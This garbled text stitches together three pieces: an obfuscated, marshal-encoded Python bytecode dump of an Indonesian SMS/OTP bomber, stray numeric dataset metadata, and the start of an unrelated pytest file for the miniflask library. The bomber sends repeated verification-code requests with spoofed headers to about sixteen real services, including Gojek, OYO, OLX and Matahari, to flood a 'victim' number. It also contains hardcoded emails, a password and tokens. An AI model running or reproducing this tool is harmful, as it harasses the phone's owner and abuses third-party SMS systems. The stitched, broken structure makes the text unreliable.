t\x00|\x01\x83\x01D\x00]H}\x02t\x01j\x02dSd\x02|\x00j\x03i\x01dTdUd&dVd\x04d)dWdXdYdZ\x9c\td\x06\x8d\x03j\x04}\x03d[|\x03v\x00\x90\x02r\xd8\x90\x02q\x98n\x06\x01\x00\x90\x02q\xe2\x90\x02q\x98t\x00|\x01\x83\x01D\x00]8}\x02t\x01j\x02d\\d\x02|\x00j\x07i\x01dDd\x04i\x01d\x06\x8d\x03j\x04}\x03d]|\x03v\x00\x90\x03r\x1a\x90\x02q\xean\x06\x01\x00\x90\x03q$\x90\x02q\xeat\x00|\x01\x83\x01D\x00]D}\x02t\tj\nd^|\x00j\x03\x17\x00dDd\x04i\x01d_\x8d\x02}\x03t\x05\xa0\x08|\x03j\x04\xa1\x01}\x04|\x04d`\x19\x00dak\x02\x90\x03rh\x90\x03q,n\x06\x01\x00\x90\x03qr\x90\x03q,t\x00|\x01\x83\x01D\x00]X}\x02t\x01j\x02dbdcdd|\x00j\x0bd1de\x9c\x04dfdgdhdidjd;dkdldmdndodpd\x0edqdr\x9c\x0ed\x06\x8d\x03j\x04}\x03ds|\x03v\x00\x90\x03r\xca\x90\x03qzn\x06\x01\x00\x90\x03q\xd4\x90\x03qzt\x00|\x01\x83\x01D\x00]\\}\x02t\x01j\x02dtt\x05\xa0\x06du|\x00j\x0bdvdIdwdxdy\x9c\x05dz\x9c\x02\xa1\x01d&d{d;d|d}d~d\x7fd\x80d\x04d\x81\x9c\td\x06\x8d\x03j\x04}\x03d\x82|\x03v\x00\x90\x04r0\x90\x03q\xdcn\x06\x01\x00\x90\x04q:\x90\x03q\xdct\x00|\x01\x83\x01D\x00]J}\x02t\tj\nd\x83|\x00j\x07\x9b\x00d\x84\x9d\x03d\x85d\x86d\x87d\x17d\x88d\x89d\x13d\x0edqd\x8a\x9c\td_\x8d\x02j\x04}\x03d\x8b|\x03v\x00\x90\x04r\x84\x90\x04qBn\x06\x01\x00\x90\x04q\x8e\x90\x04qBt\x00|\x01\x83\x01D\x00]\x80}\x02t\t\xa0\nd\x8c\xa1\x01}\x05|\x05j\x0cd\x8d\x19\x00}\x06t\x01j\x02d\x8et\x05\xa0\x06d\x8fd\x90d\x91d\x92d0d\x17|\x00j\x03d\x11d\x93d\x94d\x95\x9c\ti\x01\xa1\x01d\x96d\x97d\x98d(d\x99d;d&d\x8cd+dYd\x9a|\x06\x9b\x00\x9d\x02d\x9b\x9c\x0bd\x06\x8d\x03j\x04}\x03d\x9c|\x03v\x00\x90\x05r\x0e\x90\x04q\x96n\x06\x01\x00\x90\x05q\x18\x90\x04q\x96t\x00|\x01\x83\x01D\x00]L}\x02t\x01j\x02d#d\x02|\x00j\x03i\x01d$d\x03d%d&d\'d(d\x04d)d*d+d,d-\x9c\x0bd\x06\x8d\x03j\x04}\x03d.|\x03v\x00\x90\x05rd\x90\x05q n\x06\x01\x00\x90\x05qn\x90\x05q t\r\x83\x00\x01\x00W\x00nh\x04\x00t\tj\x0ej\x0f\x90\x05y\x9c\x01\x00\x01\x00\x01\x00t\x10t\x11\x9b\x00d\x9d\x9d\x02\x83\x01\x01\x00Y\x00nD\x04\x00t\tj\x0ej\x12\x90\x05y\xc0\x01\x00\x01\x00\x01\x00t\x10t\x11\x9b\x00d\x9d\x9d\x02\x83\x01\x01\x00Y\x00n \x04\x00t\x13t\x14f\x02\x90\x05y\xde\x01\x00\x01\x00\x01\x00t\x10d\x9e\x83\x01\x01\x00Y\x00n\x020\x00d\x00S\x00)\x9fNz)https://cmsapi.mapclub.com/api/signup-otp\xda\x05phonez\nkeep-alivez\x9aMozilla/5.0 (Linux; Android 5.1.1; SM-G600S Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36)\x02\xda\nConnection\xfa\nUser-Agent)\x02\xda\x04data\xda\x07headers\xda\x02okz5https://api.adakami.id/adaKredit/pesan/kodeVerifikasir\x01\x00\x00\x00\xda\x010)\x02Z\x05ketikZ\x05nomorz\x1fapplication/json; charset=UTF-8Z\x0234Z\x04gzipz\x0cokhttp/3.8.0Z\x02in\xda\x00Z\x06800006Z\x07android\xda\x07defaultZ\x0cadtubeagencyZ\x0fAdakamiCampaign\xda\x011z\x051.7.0z\tSM-G935FDz\x057.1.1Z\x10a4341a2sa90a4d97z$c7bbb23d-a220-4d43-9caf-153608f9bd39z!1580054114839-7395423911531673296)\x14\xfa\x0ccontent-type\xfa\x0econtent-length\xfa\x0faccept-encoding\xfa\nuser-agent\xfa\x0faccept-languagez\x0bx-ada-tokenz\x0bx-ada-appidz\x08x-ada-osz\rx-ada-channelz\x11x-ada-mediasourcez\x0cx-ada-agencyz\x0ex-ada-campaignz\nx-ada-rolez\x10x-ada-appversionz\x0cx-ada-devicez\x0bx-ada-modelz\x0cx-ada-os-verz\x0fx-ada-androididz\tx-ada-aidz\nx-ada-afidzIPermintaan kode verifikasi sudah melebihi batas. Silakan coba lagi besok.z.https://id.jagreward.com/member/verify-mobile/\xda\x07messagezrAnda akan menerima sebuah panggilan dari sistem kami. Silakan isi 6 ANGKA TERAKHIR dari nomor telepon dibawah ini.z8https://tokomanamana.com/ma/auth/request_token_merchant/z\x10tokomanamana.comZ\x0218z\x03*/*z\x18https://tokomanamana.comZ\x0eXMLHttpRequestz0application/x-www-form-urlencoded; charset=UTF-8z$https://tokomanamana.com/ma/registerz\rgzip, deflatez\x11id-ID,en-US;q=0.8)\x0b\xda\x04Hostr\x0c\x00\x00\x00z\x0eContent-Length\xda\x06AcceptZ\x06Originz\x10X-Requested-Withr\x18\x00\x00\x00\xfa\x0cContent-TypeZ\x07Referer\xfa\x0fAccept-Encoding\xfa\x0fAccept-Languagez\x1aKode OTP berhasil dikirim!zUhttps://identity-gateway.oyorooms.com/identity/api/v1/otp/generate_by_phone?locale=idz\x03+62Z\x02ID\xda\x014\xda\x04trueZ\x0eConsumer_Guest)\x06r\x0b\x00\x00\x00Z\x0ccountry_codeZ\x10country_iso_codeZ\x03nodZ\x08send_otpZ\x0bdevise_rolez\x1didentity-gateway.oyorooms.comz\x18https://www.oyorooms.com\xda\x02idz8SFI4TER1WVRTakRUenYtalpLb0w6VnhrNGVLUVlBTE5TcUFVZFpBSnc=zyMozilla/5.0 (Linux; Android 10; SM-A107F) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36z\x10application/jsonz\x1ehttps://www.oyorooms.com/loginz\x0fgzip,deflate,br)\nr\x1b\x00\x00\x00Z\rconsumer_hostr\x19\x00\x00\x00Z\x0caccess_tokenr\r\x00\x00\x00r\x1d\x00\x00\x00\xda\x06accept\xda\x06origin\xda\x07refererr\x1e\x00\x00\x00z\x1bSUCCESSFULLY GENERATED OTP z,https://app.cairin.id/v1/app/sms/sendCaptchaZ 6f8c3b90c845f09ff1bfe714a30aede8Z\x08registry)\x06Z\rhaveImageCodeZ\x08fileNamer\x0b\x00\x00\x00Z\timageCodeZ\x08userImei\xda\x04typer\x18\x00\x00\x00z\x9aMozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.110 Mobile Safari/537.36Z\tleftTimesz+https://www.olx.co.id/api/auth/authenticateZ\x05retryZ\x03sms)\x04Z\tgrantType\xda\x06methodr\x0b\x00\x00\x00\xda\x08languagez\x18VQMGU1ZVDxABU1lbBgMDUlI=z.83b09e49653c37fb4dc38423d82d74d7#1597271158063)\x05r#\x00\x00\x00\xfa\rx-newrelic-idz\x16x-panamera-fingerprintr\x18\x00\x00\x00r\x15\x00\x00\x00Z\x06statuszOhttps://auth.dekoruma.com/api/v1/register/request-otp-phone-number/?format=jsonZ\x02wa)\x02Z\x0bphoneNumber\xda\x08platform)\x02r\x15\x00\x00\x00r\x18\x00\x00\x00z-https://api.payfazz.com/v2/phoneVerificationsz\x0fapi.payfazz.comZ\x0217z\x17https://www.payfazz.comz*http://www.payfazz.com/register/BEN6ZF74XLz\x11gzip, deflate, brz#id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7)\tr\x1b\x00\x00\x00r\x16\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r\x18\x00\x00\x00r\x15\x00\x00\x00r%\x00\x00\x00r\x17\x00\x00\x00r\x19\x00\x00\x00Z\x13phoneVerificationIdz!https://harvestcakes.com/registerZ\x08functionz8https://api.danacita.co.id/users/send_otp/?mobile_phone=)\x01r\x0f\x00\x00\x00Z\x06detailz\x19Successfully sent OTP SMSz%https://api.gojekapi.com/v5/customersz\x1bnsjwwiwiwisnsnn12@gmail.comZ\x11akuinginterbang12)\x04Z\x05email\xda\x04namer\x0b\x00\x00\x00Z\x11signed_up_countryz$f8b67b26-c6a4-44d2-9d86-8d93a80901c9Z\x07AndroidZ\x108606f4e3b85968fdz\x063.52.2z\rcom.gojek.appZ\x06BearerZ\x08customerz\x05id-IDZ\x05id_IDz\x10api.gojekapi.comz\nKeep-Alivez\rokhttp/3.12.1)\x0ez\x0cX-Session-IDz\nX-Platformz\nX-UniqueIdz\x0cX-AppVersionz\x07X-AppIdr\x1c\x00\x00\x00Z\rAuthorizationz\x0bX-User-Typer\x1f\x00\x00\x00z\rX-User-Localer\x1b\x00\x00\x00r\x0c\x00\x00\x00r\x1e\x00\x00\x00r\r\x00\x00\x00Z\x07successz,https://u.icq.net/api/v14/rapi/auth/sendCodez\x1064708-1593781791z\x05en-USZ\x10ic1rtwz1s1Hj1O0rZ\x03icq)\x05r\x0b\x00\x00\x00r(\x00\x00\x00Z\x05routeZ\x05devIdZ\x0bapplication)\x02Z\x05reqIdZ\x06paramsz en-US,en;q=0.9,id;q=0.8,mt;q=0.7z\x12http://web.icq.comz\x13http://web.icq.com/\xda\x05emptyZ\x04corsz\ncross-site)\tr#\x00\x00\x00r\x19\x00\x00\x00r\x15\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00z\x0esec-fetch-destz\x0esec-fetch-modez\x0esec-fetch-siter\r\x00\x00\x00Z\x07resultsz?https://japi.maucash.id/welab-user/api/v1/send-sms-code?mobile=z\x0e&channelType=0z\x0fjapi.maucash.idz!application/json, text/plain, */*z\x0bgoogle playz\nYN-MAUCASHz\x062.4.23)\tr\x1b\x00\x00\x00r#\x00\x00\x00z\x08x-originz\x08x-org-idz\x0ex-product-codez\rx-app-versionz\x0bx-source-idr\x17\x00\x00\x00r\x18\x00\x00\x00z\x13Permintaan berhasilz1https://www.matahari.com/customer/account/create/Z\tPHPSESSIDz.https://www.matahari.com/rest/V1/thorCustomersZ\rthor_customerz\x0c Kang PacmanFz\x15aapafandi01@gmail.comZ\x15kontolanjingmemek6793z\n10/04/2000)\tr+\x00\x00\x00Z\x0bcard_numberZ\remail_addressZ\x13mobile_country_codeZ\tgender_idZ\rmobile_number\xda\x03mroZ\x08passwordZ\nbirth_datez\x10www.matahari.comZ\x03245z\x18Vg4GVFVXDxAGVVlVBgcGVlY=z\x9aMozilla/5.0 (Linux; Android 8.1.0; SM-J111F Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.141 Mobile Safari/537.36z\nPHPSESSID=)\x0br\x1b\x00\x00\x00r\x16\x00\x00\x00r)\x00\x00\x00z\x10x-requested-withr\x18\x00\x00\x00r\x15\x00\x00\x00r#\x00\x00\x00r%\x00\x00\x00r\x17\x00\x00\x00r\x19\x00\x00\x00Z\x06cookieZ\x07Successz\x1a[!] Kesalahan Pada Koneksi\xfa\x08[!] Exit)\x15\xda\x05range\xda\x03reqZ\x04postr\x05\x00\x00\x00\xda\x04text\xda\x04json\xda\x05dumpsr\x04\x00\x00\x00\xda\x05loads\xda\x04reek\xda\x03getr\x06\x00\x00\x00Z\x07cookies\xda\x07bingungZ\nexceptionsZ\x0bReadTimeout\xda\x04exit\xda\x01m\xda\x0fConnectionError\xda\x11KeyboardInterrupt\xda\x08EOFError)\x07r\x07\x00\x00\x00\xda\x03asu\xda\x01x\xda\x04send\xda\x04load\xda\x01a\xda\x01br\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05mulai\x13\x00\x00\x00s\x90\x00\x00\x00\x00\x01\x04\x01\x0c\x01\x1e\x01\x0e\x01\x06\x01\x0c\x01N\x01\x0e\x01\x06\x01\x0c\x01\x1a\x01\x10\x01\x06\x01\x0c\x010\x01\x0e\x01\x08\x01\x0c\x01>\x01\x10\x01\n\x01\x0c\x01&\x01\x10\x01\n\x01\x0c\x010\x01\x10\x01\n\x01\x0c\x01&\x01\x10\x01\n\x01\x0c\x01,\x01\x10\x01\n\x01\x0c\x01\x1c\x01\x10\x01\n\x01\x0c\x01\x18\x01\x0c\x01\x14\x01\n\x01\x0c\x01<\x01\x10\x01\n\x01\x0c\x01@\x01\x10\x01\n\x01\x0c\x01.\x01\x10\x01\n\x01\x0c\x01\n\x01\n\x01P\x01\x10\x01\n\x01\x0c\x010\x01\x10\x01\n\x01\n\x01$\x01$\x01z\x0cnyepam.mulaiN)\x05\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\n\x00\x00\x00rC\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r\x03\x00\x00\x00\x10\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x08\x02r\x03\x00\x00\x00\xda\x02osc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sX\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02\x9d\x04\x83\x01\x01\x00t\x00d\x03\x83\x01\x01\x00t\x03d\x04\x83\x01}\x00|\x00d\x05k\x02r4t\x04\x83\x00\x01\x00n |\x00d\x06k\x02rFt\x05d\x07\x83\x01\x01\x00n\x0et\x00d\x08\x83\x01\x01\x00t\x06\x83\x00\x01\x00d\x00S\x00)\tNu#\x00\x00\x00\n[\xe2\x88\x9a] Semua Spam Terkirim Berhasil\xda\x01\nz6Ingin Spam Lagi?\nKetik y untuk ya ketik t untuk tidak\nz\x06y/t : \xda\x01y\xda\x01tz\rTerima Kasih!z\x13Masukan Yang Benar!)\x07\xda\x05print\xda\x01h\xda\x01p\xda\x05input\xda\x03cokZ\x05exiter7\x00\x00\x00)\x01Z\x05pilihr\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r7\x00\x00\x00]\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x14\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\n\x02\x08\x01r7\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s$\x01\x00\x00z\xcet\x00d\x01\x83\x01}\x00|\x00d\x02d\x03\x85\x02\x19\x00}\x01|\x00d\x04v\x00r(t\x01d\x05\x83\x01\x01\x00n\xa4d\x06|\x01v\x01r:t\x01d\x07\x83\x01\x01\x00n\x92t\x02|\x00\x83\x01d\x08k\x01rPt\x01d\t\x83\x01\x01\x00n||\x00d\nk\x02rbt\x01d\x0b\x83\x01\x01\x00njz\x10t\x03t\x00d\x0c\x83\x01\x83\x01}\x02W\x00n\x1a\x01\x00\x01\x00\x01\x00t\x01d\r\x83\x01\x01\x00t\x04\x83\x00\x01\x00Y\x00n\x020\x00t\x05\xa0\x06d\x03\xa1\x01\x01\x00t\x01d\x0e\x83\x01\x01\x00|\x00d\x0fd\x10\x85\x02\x19\x00}\x03d\x11|\x03\x17\x00}\x04t\x07|\x03|\x00|\x04\x83\x03\xa0\x08|\x02\xa1\x01\x01\x00W\x00\x90\x01q W\x00q\x00\x04\x00t\ty\xfe\x01\x00}\x05\x01\x00z\x18t\nt\x0b|\x05\x83\x01\x83\x01\x01\x00W\x00Y\x00d\x00}\x05~\x05q\x00d\x00}\x05~\x050\x00\x04\x00t\x0ct\rf\x02\x90\x01y\x1c\x01\x00\x01\x00\x01\x00t\nd\x12\x83\x01\x01\x00Y\x00q\x000\x00q\x00d\x00S\x00)\x13Nu\x1c\x00\x00\x00[+] Nomer Korban 08\xc3\x97\xc3\x97\xc3\x97\t: r\x01\x00\x00\x00\xe9\x02\x00\x00\x00)\x02r\x12\x00\x00\x00\xfa\x01 z\x15[!] Jangan Kosong AjgZ\x0208z\x18[!] Gunakan Nomer 08xxx\n\xe9\n\x00\x00\x00z#[!] Nomer Harus Lebih Dari 10 AngkaZ\x0c081368646011z3[!] Anda Tidak Bisa Spam Yang Punya Script Goblok!\nz\x1a[+] Masukan Jumlah Spam\t: z"Masukan Format Angka Jangan Huruf!z\x17\n[+] Sedang Menyepam...\xe9\x01\x00\x00\x00\xe9\x0c\x00\x00\x00Z\x0262r.\x00\x00\x00)\x0erN\x00\x00\x00rK\x00\x00\x00\xda\x03len\xda\x03intrO\x00\x00\x00\xda\x04time\xda\x05sleepr\x03\x00\x00\x00rC\x00\x00\x00\xda\tExceptionr8\x00\x00\x00\xda\x03strr;\x00\x00\x00r<\x00\x00\x00)\x06rA\x00\x00\x00r=\x00\x00\x00Z\x03suurB\x00\x00\x00\xda\x01cZ\x02exr\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00rO\x00\x00\x00h\x00\x00\x00s(\x00\x00\x00\x00\x02\x02\x01\x08\x01\x0c\x01\x12\x01\x12\x01\x16\x01\x12\x02\x02\x01\x10\x01\x06\x01\x08\x01\x0c\x01\n\x01\x08\x01\x0c\x01\x08\x01\x12\x01\n\x01.\x01rO\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x00\x00\x00t\x00t\x01\x9b\x00t\x02\x17\x00t\x03\x9b\x00d\x01t\x01\x9b\x00d\x02\x9d\x04\x17\x00\x83\x01\x01\x00d\x00S\x00)\x03Nz(\nFOLLOW IG @anker_2412 | 16 Operator Otpzr\n\nJangan Disalah Gunakan Anjg\nJumlah Spam Dikalikan Dengan 16\nContoh Jumlah Spam 2\nJadinya 2 Dikali 16 Spamnya 32\n)\x04rK\x00\x00\x00rM\x00\x00\x00\xda\x05titlerL\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05memek\x7f\x00\x00\x00s\x02\x00\x00\x00\x00\x01r]\x00\x00\x00\xda\x08__main__)\x16Z\x08requestsr5\x00\x00\x00r2\x00\x00\x00rG\x00\x00\x00rW\x00\x00\x00Z\x08pyfiglet\xda\x06systemZ\x07Sessionr0\x00\x00\x00Z\rfiglet_formatr\\\x00\x00\x00rM\x00\x00\x00rL\x00\x00\x00r9\x00\x00\x00Z\x03berZ\x03gagr\x03\x00\x00\x00\xda\n__import__r7\x00\x00\x00rO\x00\x00\x00r]\x00\x00\x00rD\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s(\x00\x00\x00(\x01\x02\x01\x0c\x01\x06\x01\x10\x01\x08\x01\n\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x0eL\x0e\x01\x08\x0b\x08\x17\x08\x02\x08\x01\x06\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 3,513.666667
| 20,998
| 0.778769
| 4,252
| 21,082
| 3.846425
| 0.211665
| 0.233323
| 0.198655
| 0.18343
| 0.423479
| 0.368756
| 0.330969
| 0.317028
| 0.299175
| 0.290737
| 0
| 0.313344
| 0.009677
| 21,082
| 6
| 20,998
| 3,513.666667
| 0.470016
| 0.002893
| 0
| 0
| 0
| 1.5
| 0.864307
| 0.622229
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
|
0
| 16
|
a426c010e109d7bca127716868620e8023e00378
| 415
|
py
|
Python
|
credsweeper/filters/group/__init__.py
|
cuspymd/CredSweeper
|
376e7faff41d8b58f0d9e2a82955ad0929ee8290
|
[
"MIT"
] | 17
|
2021-10-22T00:29:46.000Z
|
2022-03-21T03:05:56.000Z
|
credsweeper/filters/group/__init__.py
|
shadowscatcher/CredSweeper
|
0387ed76aca4a12154e15c49db8dc0901a014275
|
[
"MIT"
] | 29
|
2021-11-05T21:10:51.000Z
|
2022-03-30T10:41:08.000Z
|
credsweeper/filters/group/__init__.py
|
shadowscatcher/CredSweeper
|
0387ed76aca4a12154e15c49db8dc0901a014275
|
[
"MIT"
] | 16
|
2021-11-05T20:39:54.000Z
|
2022-03-11T00:57:32.000Z
|
from credsweeper.filters.group.group import Group # isort:skip
from credsweeper.filters.group.general_keyword import GeneralKeyword
from credsweeper.filters.group.general_pattern import GeneralPattern
from credsweeper.filters.group.password_keyword import PasswordKeyword
from credsweeper.filters.group.pem_pattern import PEMPattern
from credsweeper.filters.group.url_credentials_group import UrlCredentialsGroup
| 51.875
| 79
| 0.884337
| 50
| 415
| 7.22
| 0.38
| 0.249307
| 0.365651
| 0.448753
| 0.188366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06747
| 415
| 7
| 80
| 59.285714
| 0.932817
| 0.024096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
a427419eefeee70caf121b5ea3946d6081a0f33e
| 471
|
py
|
Python
|
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
drivers/plot_cdf_rp_agecut_KS_test.py
|
lgbouma/gilly
|
b3bc7cf53c28eee6420cd85c3975062d4f46c611
|
[
"MIT"
] | null | null | null |
import numpy as np
from gilly.plotting import plot_cdf_rp_agecut_KS_test
for a in 1e9*np.arange(0.7,1.6,0.1):
plot_cdf_rp_agecut_KS_test(agecut=a, Prot_source='VSINI', gyro_source='SL20')
plot_cdf_rp_agecut_KS_test(agecut=a, Prot_source='VSINI', gyro_source='A19')
for a in 1e9*np.arange(0.7,1.6,0.1):
plot_cdf_rp_agecut_KS_test(agecut=a, Prot_source='M15', gyro_source='SL20')
plot_cdf_rp_agecut_KS_test(agecut=a, Prot_source='M15', gyro_source='A19')
| 42.818182
| 81
| 0.764331
| 94
| 471
| 3.478723
| 0.308511
| 0.107034
| 0.137615
| 0.229358
| 0.865443
| 0.865443
| 0.801223
| 0.801223
| 0.801223
| 0.801223
| 0
| 0.065882
| 0.097665
| 471
| 10
| 82
| 47.1
| 0.703529
| 0
| 0
| 0.25
| 0
| 0
| 0.063694
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a46f7de7fe58dcbe708e4473d6947e1e8491ff37
| 33
|
py
|
Python
|
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
src/masonite/orm/blueprint/__init__.py
|
Marlysson/orm
|
ec2f3e3c107135c95ecddc5034c809114344c880
|
[
"MIT"
] | null | null | null |
from .Blueprint import Blueprint
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
a4721283725798b1b7e6875be3aed206d66f9fc3
| 2,702
|
py
|
Python
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 5
|
2020-02-17T12:14:36.000Z
|
2020-02-27T12:09:05.000Z
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 69
|
2020-04-03T08:16:35.000Z
|
2021-12-21T15:46:29.000Z
|
tests/argparse/special/test_overwrite.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 1
|
2020-04-02T15:46:39.000Z
|
2020-04-02T15:46:39.000Z
|
from pathlib import Path
import pytest
import miniflask # noqa: E402
def test_setup(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults"])
mf.parse_args([
"--var_default_override_twice_and_cli", "1114"
])
captured = capsys.readouterr()
mf.event.print_all()
captured = capsys.readouterr()
assert captured.out == """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 2
modules.defaults.var_default_override_twice: 3
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
def test_override(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults", "defaults_override"])
mf.parse_args([
"--var_default_override_twice_and_cli", "1114"
])
captured = capsys.readouterr()
mf.event.print_all()
captured = capsys.readouterr()
assert captured.out == """
modules.defaults.var_default: 1
modules.defaults.var_default_override: 12
modules.defaults.var_default_override_twice: 13
modules.defaults.var_default_override_twice_and_cli: 1114
""".lstrip()
def test_override_twice(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["defaults", "defaults_override", "defaults_override_twice"])
mf.parse_args([
